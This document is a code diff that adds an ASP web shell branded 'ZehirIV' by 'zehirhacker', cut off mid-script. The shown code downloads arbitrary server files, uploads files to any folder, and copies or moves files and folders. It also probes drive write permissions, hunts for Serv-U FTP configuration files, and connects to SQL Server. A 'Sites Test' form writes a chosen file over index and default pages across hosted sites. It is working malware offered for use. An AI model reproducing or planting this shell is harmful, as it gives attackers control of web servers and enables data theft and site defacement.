+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf	   = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH") 
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+	
+    Response.contenttype="application/force-download"
+	Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+	Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+	response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+	function sistemBilgisi(yol){
+		NewWindow(yol,"",600,240,"no");
+	}
+	function SitelerTestte(yol){
+		NewWindow(yol,"",530,420,"no");
+	}
+	function klasorIslemleri(yol){
+		NewWindow(yol,"",400,280,"no");
+	}
+	function sqlServer(yol){
+		NewWindow(yol,"",300,50,"no");
+	}
+	function poweredby(yol){
+		NewWindow(yol,"",300,50,"no");
+	}
+	function sistemTest(yol){
+		NewWindow(yol,"",400,300,"no");
+	}
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+	Private mbinData
+	Private mlngChunkIndex
+	Private mlngBytesReceived
+	Private mstrDelimiter
+	Private CR
+	Private LF
+	Private CRLF
+	Private mobjFieldAry()
+	Private mlngCount
+	
+	Private Sub RequestData
+		Dim llngLength
+		mlngBytesReceived = Request.TotalBytes
+		mbinData = Request.BinaryRead(mlngBytesReceived)
+	End Sub
+
+	Private Sub ParseDelimiter()
+		mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+	End Sub
+
+	Private Sub ParseData()
+		Dim llngStart
+		Dim llngLength
+		Dim llngEnd
+		Dim lbinChunk
+		llngStart = 1
+		llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+		While Not llngStart = 0
+			llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+			llngLength = llngEnd - llngStart
+			lbinChunk = MidB(mbinData, llngStart, llngLength)
+			Call ParseChunk(lbinChunk)
+			llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+		Wend
+	End Sub
+
+	Private Sub ParseChunk(ByRef pbinChunk)
+		Dim lstrName
+		Dim lstrFileName
+		Dim lstrContentType
+		Dim lbinData
+		Dim lstrDisposition
+		Dim lstrValue
+		lstrDisposition = ParseDisposition(pbinChunk)
+		lstrName = ParseName(lstrDisposition)
+		lstrFileName = ParseFileName(lstrDisposition)
+		lstrContentType = ParseContentType(pbinChunk)
+		If lstrContentType = "" Then
+			lstrValue = CStrU(ParseBinaryData(pbinChunk))
+		Else
+			lbinData = ParseBinaryData(pbinChunk)
+		End If
+		Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+	End Sub
+
+	Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+		Dim lobjField
+		ReDim Preserve mobjFieldAry(mlngCount)
+		Set lobjField = New clsField
+		lobjField.Name = pstrName
+		lobjField.FilePath = pstrFileName				
+		lobjField.ContentType = pstrContentType
+		If LenB(pbinData) = 0 Then
+			lobjField.BinaryData = ChrB(0)
+			lobjField.Value = pstrValue
+			lobjField.Length = Len(pstrValue)
+		Else
+			lobjField.BinaryData = pbinData
+			lobjField.Length = LenB(pbinData)
+			lobjField.Value = ""
+		End If
+		Set mobjFieldAry(mlngCount) = lobjField
+		mlngCount = mlngCount + 1
+	End Sub
+
+	Private Function ParseBinaryData(ByRef pbinChunk)
+		Dim llngStart
+		llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+		If llngStart = 0 Then Exit Function
+		llngStart = llngStart + 4
+		ParseBinaryData = MidB(pbinChunk, llngStart)
+	End Function
+
+	Private Function ParseContentType(ByRef pbinChunk)
+		Dim llngStart
+		Dim llngEnd
+		Dim llngLength
+		llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+		If llngStart = 0 Then Exit Function
+		llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+		If llngEnd = 0 Then Exit Function
+		llngStart = llngStart + 15
+		If llngStart >= llngEnd Then Exit Function
+		llngLength = llngEnd - llngStart
+		ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+	End Function
+
+	Private Function ParseDisposition(ByRef pbinChunk)
+		Dim llngStart
+		Dim llngEnd
+		Dim llngLength
+		llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+		If llngStart = 0 Then Exit Function
+		llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+		If llngEnd = 0 Then Exit Function
+		llngStart = llngStart + 22
+		If llngStart >= llngEnd Then Exit Function
+		llngLength = llngEnd - llngStart
+		ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+	End Function
+
+	Private Function ParseName(ByRef pstrDisposition)
+		Dim llngStart
+		Dim llngEnd
+		Dim llngLength
+		llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+		If llngStart = 0 Then Exit Function
+		llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+		If llngEnd = 0 Then Exit Function
+		llngStart = llngStart + 6
+		If llngStart >= llngEnd Then Exit Function
+		llngLength = llngEnd - llngStart
+		ParseName = Mid(pstrDisposition, llngStart, llngLength)
+	End Function
+' ------------------------------------------------------------------------------
+	Private Function ParseFileName(ByRef pstrDisposition)
+		Dim llngStart
+		Dim llngEnd
+		Dim llngLength
+		llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+		If llngStart = 0 Then Exit Function
+		llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+		If llngEnd = 0 Then Exit Function
+		llngStart = llngStart + 10
+		If llngStart >= llngEnd Then Exit Function
+		llngLength = llngEnd - llngStart
+		ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+	End Function
+
+	Public Property Get Count()
+		Count = mlngCount
+	End Property
+
+	Public Default Property Get Fields(ByVal pstrName)
+		Dim llngIndex
+		If IsNumeric(pstrName) Then
+			llngIndex = CLng(pstrName)
+			If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+				Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+				Exit Property
+			End If
+			Set Fields = mobjFieldAry(pstrName)
+		Else
+			pstrName = LCase(pstrname)
+			For llngIndex = 0 To mlngCount - 1
+				If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+					Set Fields = mobjFieldAry(llngIndex)
+					Exit Property
+				End If
+			Next
+		End If
+		Set Fields = New clsField
+	End Property
+
+	Private Sub Class_Terminate()
+		Dim llngIndex
+		For llngIndex = 0 To mlngCount - 1
+			Set mobjFieldAry(llngIndex) = Nothing
+			
+		Next
+		ReDim mobjFieldAry(-1)
+	End Sub
+
+	Private Sub Class_Initialize()
+		ReDim mobjFieldAry(-1)
+		CR = ChrB(Asc(vbCr))
+		LF = ChrB(Asc(vbLf))
+		CRLF = CR & LF
+		mlngCount = 0
+		Call RequestData
+		Call ParseDelimiter()
+		Call ParseData
+	End Sub
+
+	Private Function CStrU(ByRef pstrANSI)
+		Dim llngLength
+		Dim llngIndex
+		llngLength = LenB(pstrANSI)
+		For llngIndex = 1 To llngLength
+			CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+		Next
+	End Function
+
+	Private Function CStrB(ByRef pstrUnicode)
+		Dim llngLength
+		Dim llngIndex
+		llngLength = Len(pstrUnicode)
+		For llngIndex = 1 To llngLength
+			CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+		Next
+	End Function
+End Class
+'####################################
+Session("n1") = "byZ"
+Class clsField
+	Public Name
+	Private mstrPath
+	Public FileDir
+	Public FileExt
+	Public FileName
+	Public ContentType
+	Public Value
+	Public BinaryData
+	Public Length
+	Private mstrText
+
+	Public Property Get BLOB()
+		BLOB = BinaryData
+	End Property
+
+	Public Function BinaryAsText()
+		Dim lbinBytes
+		Dim lobjRs
+		If Length = 0 Then Exit Function
+		If LenB(BinaryData) = 0 Then Exit Function
+		
+		If Not Len(mstrText) = 0 Then
+			BinaryAsText = mstrText
+			Exit Function
+		End If
+		lbinBytes = ASCII2Bytes(BinaryData)
+   		mstrText = Bytes2Unicode(lbinBytes)
+    	BinaryAsText = mstrText
+	End Function
+
+	Public Sub SaveAs(ByRef pstrFileName)
+		Const adTypeBinary=1
+		Const adSaveCreateOverWrite=2
+		Dim lobjStream
+		Dim lobjRs
+		Dim lbinBytes
+		If Length = 0 Then Exit Sub
+		If LenB(BinaryData) = 0 Then Exit Sub
+		Set lobjStream = Server.CreateObject("ADODB.Stream")
+		lobjStream.Type = adTypeBinary
+		Call lobjStream.Open()
+		lbinBytes = ASCII2Bytes(BinaryData)
+		Call lobjStream.Write(lbinBytes)
+		
+		On Error Resume Next
+		
+		Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+		
+		'if err<>0 then response.Write "<br>"&err.Description
+		
+		Call lobjStream.Close()
+		Set lobjStream = Nothing
+	End Sub
+
+	Public Property Let FilePath(ByRef pstrPath)
+		mstrPath = pstrPath
+		If Not InStrRev(pstrPath, ".") = 0 Then
+			FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+			FileExt = UCase(FileExt)
+		End If
+		If Not InStrRev(pstrPath, "\") = 0 Then
+			FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+		End If
+		If Not InStrRev(pstrPath, "\") = 0 Then
+			FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+		End If
+	End Property
+
+	Public Property Get FilePath()
+		FilePath = mstrPath
+	End Property
+
+	private Function ASCII2Bytes(ByRef pbinBinaryData)
+		Const adLongVarBinary=205
+		Dim lobjRs
+		Dim llngLength
+		Dim lbinBuffer
+		llngLength = LenB(pbinBinaryData)
+		Set lobjRs = Server.CreateObject("ADODB.Recordset")
+		Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+		Call lobjRs.Open()
+		Call lobjRs.AddNew()
+		Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+		Call lobjRs.Update()
+		lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+		Call lobjRs.Close()
+		Set lobjRs = Nothing
+		ASCII2Bytes = lbinBuffer
+	End Function
+
+	Private Function Bytes2Unicode(ByRef pbinBytes)
+		Dim lobjRs
+		Dim llngLength
+		Dim lstrBuffer
+		llngLength = LenB(pbinBytes)
+		Set lobjRs = Server.CreateObject("ADODB.Recordset")
+    	Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+    	Call lobjRs.Open()
+    	Call lobjRs.AddNew()
+    	Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+    	Call lobjRs.Update()
+    	lstrBuffer = lobjRs.Fields("BinaryData").Value
+    	Call lobjRs.Close()
+    	Set lobjRs = Nothing
+		Bytes2Unicode = lstrBuffer
+	End Function
+End Class
+Session("n2") = "ehir" 
+'####################################
+function addslash(path)
+	if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+	dim objUpload,f,max,i,name,path,size,success
+	
+	set objUpload=New clsUpload
+
+	targetPath=objUpload.Fields("folder").Value
+	max=objUpload.Fields("max").Value
+
+	for i=1 to max
+		name=objUpload.Fields("file" & i).FileName
+		size=objUpload.Fields("file" & i).Length
+		if (name<>"") and (size>0) then
+			gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+			path=addslash(targetPath) & name
+			objUpload.Fields("file" & i).SaveAs path
+
+			if objFSO.FileExists(path) then
+				on error resume next
+				set f=objFSO.GetFile(path)
+				if IsObject(f) then
+					if f.Size=size then success=true else success=false
+				end if
+				set f=nothing
+			end if
+			if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+		end if
+	next
+	response.Write gMsg
+	set objUpload=nothing
+
+end sub
+
+if status="-4" then
+	Upload()
+'	hataKontrol
+	popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+	if err<>0 then
+		Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+	end if
+end sub
+
+sub araBul(path_,ara_)
+	on error resume next
+	If Len(path_) > 0 Then
+		cur = path_&"\"
+		If cur = "\\" Then cur = ""
+			parent = ""
+			If InStrRev(cur,"\") > 0 Then
+			parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+		End If
+	Else
+		cur = ""
+	End If
+	
+	Set f = objFSO.GetFolder(cur)
+
+	Set fc = f.Files
+	For Each f1 In fc
+		if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+			downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
+			if lcase(ara_)="mdb" then
+				Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+			else 
+				Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+			end if
+		end if
+	Next
+
+	Set fs = f.SubFolders
+	For Each f1 In fs
+		araBul f1.path,ara_
+	Next
+	Set	f		= Nothing
+	Set fc		= Nothing
+	Set fs		= Nothing
+end sub
+
+sub sistemTest
+	response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+	response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"
+
+	servu_Test
+	WriteTestOnDriver
+	WriteTestOnLocalPath
+	LocalPathParentFolder
+	LocalPathPParentFolder
+
+	response.Write "</table>"
+end sub
+
+sub servu_Test
+	dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+	for each drive_ in objFSO.Drives
+		if drive_.Drivetype=2 or drive_.Drivetype=3 then 
+			for each d_ in dosya_
+				d_ = drive_.DriveLetter&":\"&d_
+				if objFSO.FileExists(d_) then
+					response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+				end if
+			next
+		end if
+	next
+end sub
+
+function yaziyomu(yol)
+	on error goto 0:on error resume next
+	dim sonuc__
+	Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+	MyFile.write "byzehir <zehirhacker@hotmail.com>"
+	set MyFile = Nothing
+	if err<>0 then 
+		sonuc__="<font color=red>Yazma Hakkı Yok!</font>"
+	else 
+		sonuc__="<font color=yellow>Yazma Hakkı Var!</font>"
+		on error goto 0: on error resume next
+		objFSO.DeleteFile yol & "\test.zehir",true
+		if err<>0 then 
+			sonuc__=sonuc__&"<br><font color=red>Silme Hakkı Yok!</font>"
+		else
+			sonuc__=sonuc__&"<br><font color=yellow>Silme Hakkı Var!</font>"
+		end if
+	end if
+	yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+	on error goto 0:on error resume next
+	Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+	MyFile.write "byzehir <zehirhacker@hotmail.com>"
+	set MyFile = Nothing
+	if err<>0 then 
+		yaziyomu2 = false
+	else 
+		objFSO.DeleteFile yol & "\test.zehir"
+		yaziyomu2 = true
+	end if
+end function
+
+sub WriteTestOnDriver
+	for each drive_ in objFSO.Drives
+		if drive_.Drivetype=2 or drive_.Drivetype=3 then 
+			if not yaziyomu2(drive_.DriveLetter&":\") then
+				Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+			else
+				Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+			end if
+		end if
+	next
+end sub
+
+sub WriteTestOnLocalPath
+	on error goto 0
+	on error resume next
+	if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+		Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+	else
+		Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+	end if
+end sub
+
+sub LocalPathParentFolder
+	on error goto 0
+	on error resume next
+	hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+	parhed_ = left(hed_,InStrRev(hed_,"\"))
+	
+	Set f = objFSO.GetFolder(parhed_)
+	Set fc = f.SubFolders
+	
+	int_fol=0
+	int_fil=0
+	For Each f1 In fc
+		int_fol=int_fol+1
+	Next
+
+	Set fc = f.files
+	For Each f1 In fc
+		int_fil=int_fil+1
+	Next
+	
+	if err<>0 then
+		Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+	else
+		Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+	end if
+end sub
+
+sub LocalPathPParentFolder
+	on error goto 0
+	on error resume next
+	hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+	hed_ = left(hed_,InStrRev(hed_,"\"))
+	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+	parhed_ = left(hed_,InStrRev(hed_,"\"))
+	
+	Set f = objFSO.GetFolder(parhed_)
+	Set fc = f.SubFolders
+	int_fol=0
+	int_fil=0
+	For Each f1 In fc
+		int_fol=int_fol+1
+	Next
+
+	Set fc = f.files
+	For Each f1 In fc
+		int_fil=int_fil+1
+	Next
+	
+	if err<>0 then
+		if err=451 then
+			Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
+		else
+			Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+		end if
+	else
+		Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+	end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+	Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+	Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+	Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+	Response.Write "</table>"
+	popup = false
+CASE 14 'Upload and Search
+	aramaUpload
+	popup = false
+	hataKontrol
+CASE 15 'Ms. SQL Server
+	Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
+	Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+	Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+	response.Write "<input type=submit value='SQL Servera Bağlan' style='height:23;width:170' id=submit1 name=submit1>"
+	Response.Write "</td></tr></table>"
+	response.Write "</form>"
+
+	popup = false
+	hataKontrol
+CASE 16 'file Copy window
+	Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+	Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+	Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+	response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+	Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+	response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+	response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+	response.Write "</table>"
+	response.Write "</form>"
+
+	popup = false
+	hataKontrol
+CASE 17 'file Copy 
+	isl = ""
+	if islem="kopyala" then
+		objFSO.CopyFile path,cf
+		isl="kopyalandı.." 
+	elseif islem="tasi" then
+		objFSO.MoveFile path,cf
+		isl="taşındı.." 
+	end if
+	response.Write "Dosya "&isl
+	response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+	response.Write "<br>"
+	popup = false
+	hataKontrol
+CASE 18 'folder Copy window
+	Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+	Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+	Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+	response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+	Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+	response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+	response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+	response.Write "</table>"
+	response.Write "</form>"
+
+	popup = false
+	hataKontrol
+CASE 19 'folder Copy 
+	isl = ""
+	if islem="kopyala" then
+		objFSO.CopyFolder path,cf
+		isl="kopyalandı.." 
+	elseif islem="tasi" then
+		objFSO.MoveFolder path,cf
+		isl="taşındı.." 
+	end if
+	response.Write "Klasor "&isl
+	response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+	response.Write "<br>"
+	popup = false
+	hataKontrol
+CASE 33 'Powered By
+	response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+	response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
+	popup = false
+	hataKontrol
+CASE 40 'Sistem Test
+	sistemTest
+	popup=false
+CASE 50 'Siteleri Test Edelim :D
+	%>
+	<table width="100%" cellpadding=0 cellspacing=0>
+		<tr>
+			<td align=center>
+				<b>Güvenlik Testi byZehir</b>
+				<br>
+				<form action="<%=dosyaPath%>" method=post id=frmMesaj>
+					<input type=hidden name=kuskapani value=2>
+					<table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+						<tr>
+							<td width=100>Path</td>
+							<td>
+                            <input style="width:100%" type=text name="Path" id="Path" value="<%=path%>" size="20"></td>
+						</tr>
+						<tr>
+							<td width=100>Sub Folder</td>
+							<td>
+                            <input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www" size="20"></td>
+						</tr>
+						<tr>
+							<td width=100>File Name</td>
+							<td>
+                            <input style="width:100%" type=text name="FileName" id="FileName" value="byzehir.txt" size="20"></td>
+						</tr>
+						<tr>
+							<td colspan=2>
+								<table width="100%" align=center>
+									<tr>
+										<td width="50%">
+											<input type=checkbox name="dosya1" ID="Checkbox1" value="ON">index.htm<br>
+											<input type=checkbox name="dosya2" ID="Checkbox2" value="ON">default.htm<br>
+										</td>
+										<td width="50%">
+											<input type=checkbox name="dosya3" ID="Checkbox3" value="ON">index.asp<br>
+											<input type=checkbox name="dosya4" ID="Checkbox4" value="ON">default.asp<br>
+										</td>
+									</tr>
+								</table>
+							</td>
+						</tr>
+						<tr>
+							<td colspan=2 align=center>
+								<a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+								<a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+								<a href="#" onClick="FormatText('paste')" alt="Yapıştır">Yapıştır</a>
+								<a href="#" alt="Kalın" onClick="FormatText('bold', '')">Bold</a>
+								<a href="#" alt="İtalic" onClick="FormatText('italic', '')">Italic</a>
+								<a href="#" alt="Altı Çizili" onClick="FormatText('underline', '')">UnderLine</a>
+								<a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalı">JustifyLeft</a>
+								<a href="#" alt="Ortada Hizalı" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+								<a href="#" onClick="FormatText('JustifyRight', '')" alt="Sağa Hizalı">JustifyRight</a>
+								<a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+								<a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+								<select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+								<select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kırmızı</option>
+                                  <option value="green">Yeşil</option>
+                                  <option value="yellow">Sarı</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açık Mavi</option>
+                                  <option value="limegreen">Açık Yeşil</option>
+                                </select>
+								
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+								<iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")&Session("n2")%>"></iframe>
+								<script language=javascript>
+									frames.byZehir.document.designMode = "On";
+									function bgc(option){
+										frames.byZehir.document.body.bgColor=option;
+									}
+									function FormatText(command, option){
